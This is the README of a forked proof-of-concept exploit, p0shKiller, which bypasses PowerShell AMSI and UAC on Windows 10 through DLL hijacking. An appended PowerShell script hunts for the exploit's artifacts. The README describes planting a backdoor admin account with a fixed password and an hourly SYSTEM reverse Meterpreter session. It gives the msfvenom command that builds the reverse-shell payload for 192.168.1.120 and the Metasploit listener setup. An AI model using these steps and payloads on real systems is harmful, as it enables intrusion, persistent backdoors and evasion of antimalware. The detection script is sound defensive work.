00kush00 / p0shkiller
This project forked from cn33liz/p0shkiller
License: BSD 3-Clause "New" or "Revised" License
p0shKiller
By Cn33liz - 2016

Windows 10 PowerShell 5 - AMSI/UAC Bypass/Backdoor/Exploit using DLL Hijacking

Proof of Concept exploit to bypass Microsoft's latest AntiMalware Scan Interface (AMSI) technology within PowerShell 5 on Windows 10. With this exploit/patch applied, you can take control over PowerShell's program flow using DLL hijacking and UAC bypass techniques.

Every time PowerShell is started, a local admin named BadAss with password FacePalm01 is added to the system (when run by a non-elevated administrator account), and a reverse (SYSTEM) HTTPS Meterpreter session (default 192.168.1.120) is started every hour using a scheduled task.

Current status:

* Reported to MSRC on 28-03-2016
* From Microsoft's perspective, AMSI/AntiVirus isn't a traditional security boundary.

Requirements:

* A Windows 10 box with the latest security patches applied.
* Default UAC settings.
* Local administrator privileges to apply the patch (no need for elevation, because the exploit uses a UAC bypass to patch AMSI/PowerShell).
* A remote HTTPS reverse Meterpreter listener.
* A p0sh fanboy that uses PowerShell on his system ;)

This exploit contains 5 components (and 1 Python script):

* p0shKiller.exe - The main tool to apply the patch (only needed once).
* UacBypass.dll - Injected into the explorer.exe process; uses the IFileOperation COM interface to copy the needed DLLs (only needed once). Because the copy is performed from within explorer.exe, IFileOperation writes into the protected directories without showing a UAC prompt.
* Amsi.dll - This fake DLL is copied into C:\Windows\System32\WindowsPowerShell\v1.0 and is the main vulnerable component. That directory is powershell.exe's application directory, which the default DLL search order checks before C:\Windows\System32, so the fake DLL is loaded instead of the genuine amsi.dll.
* ntwdblib.dll - Fake ntwdblib.dll copied into C:\Windows\System32, which is loaded by cliconfg.exe (an auto-elevated process) to bypass UAC.
* MPAmsiRun.exe - XOR'ed Meterpreter shellcode payload that is copied into C:\Windows\System32 and called by Amsi.dll.
* XORMeter.py - Python script to generate your own Meterpreter payload (MPAmsiRun.exe), by @vvalien1.

The following shellcode is used as payload and compiled within the code:

    msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.120 LPORT=443 EXITFUNC=thread -f hex > Shellcode.txt

Set up your remote msf listener:

    use exploit/multi/handler
    set payload windows/x64/meterpreter/reverse_https
    set LHOST 0.0.0.0
    set LPORT 443
    set AutoRunScript post/windows/manage/priv_migrate
    exploit -j

* Parts of this code have been borrowed from: https://github.com/hjc4869/UacBypass
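The components listed above leave a fixed set of artifacts on a patched host: the hijacked amsi.dll in the PowerShell directory, ntwdblib.dll and MPAmsiRun.exe in System32, the BadAss account, and a scheduled task that launches the payload. The following PowerShell script is an added example for defenders, not part of p0shKiller or its fork; it hunts for exactly those artifacts. The paths and the account name are taken from the README; the scheduled task name is not given there, so tasks are matched by the executable they launch. Run it in an elevated PowerShell 5 session on Windows 10.

```powershell
# Added example (not p0shKiller code): hunt for the artifacts described in the README.
# Assumptions: paths and account name as in the README; task matched by its action.

$findings = New-Object System.Collections.Generic.List[string]

# 1. DLL-hijack drop sites named in the README. powershell.exe lives in the
#    v1.0 directory, and the application directory is searched before
#    System32, so an amsi.dll there shadows the genuine one.
$dropFiles = @(
    "$env:SystemRoot\System32\WindowsPowerShell\v1.0\amsi.dll",
    "$env:SystemRoot\System32\ntwdblib.dll",
    "$env:SystemRoot\System32\MPAmsiRun.exe"
)
foreach ($path in $dropFiles) {
    if (Test-Path -LiteralPath $path) {
        $sig = Get-AuthenticodeSignature -FilePath $path
        $signer = if ($sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { '<unsigned>' }
        $findings.Add("Unexpected file: $path (signature: $($sig.Status), signer: $signer)")
    }
}

# 2. Backdoor account. Get-LocalUser / Get-LocalGroupMember ship with
#    Windows 10 (Microsoft.PowerShell.LocalAccounts module).
$badUser = Get-LocalUser -Name 'BadAss' -ErrorAction SilentlyContinue
if ($badUser) {
    $isAdmin = Get-LocalGroupMember -Group 'Administrators' -ErrorAction SilentlyContinue |
        Where-Object { $_.Name -like '*\BadAss' }
    $findings.Add("Local account 'BadAss' present (enabled: $($badUser.Enabled); in Administrators: $([bool]$isAdmin))")
}

# 3. Scheduled task that launches the payload. The README does not name the
#    task, so match on the action's executable and arguments instead.
Get-ScheduledTask | ForEach-Object {
    $task = $_
    foreach ($action in $task.Actions) {
        if ("$($action.Execute) $($action.Arguments)" -match 'MPAmsiRun') {
            $findings.Add("Scheduled task '$($task.TaskPath)$($task.TaskName)' runs $($action.Execute) as $($task.Principal.UserId)")
        }
    }
}

# 4. Cross-check: the genuine amsi.dll in System32 must still carry a valid
#    Microsoft Authenticode signature.
$realAmsi = "$env:SystemRoot\System32\amsi.dll"
$realSig = Get-AuthenticodeSignature -FilePath $realAmsi
if ($realSig.Status -ne 'Valid') {
    $findings.Add("System32\amsi.dll signature status is $($realSig.Status)")
}

if ($findings.Count -eq 0) {
    Write-Output 'No p0shKiller indicators found.'
} else {
    $findings | ForEach-Object { Write-Warning $_ }
    exit 1
}
```

The signature check on the dropped files is deliberate: a genuine amsi.dll is Microsoft-signed, so any amsi.dll sitting in the PowerShell directory that is unsigned or signed by someone else is a hijack candidate even if the file name looks right. The script exits with status 1 when anything is found, so it can be dropped into a scheduled sweep or a configuration-management check.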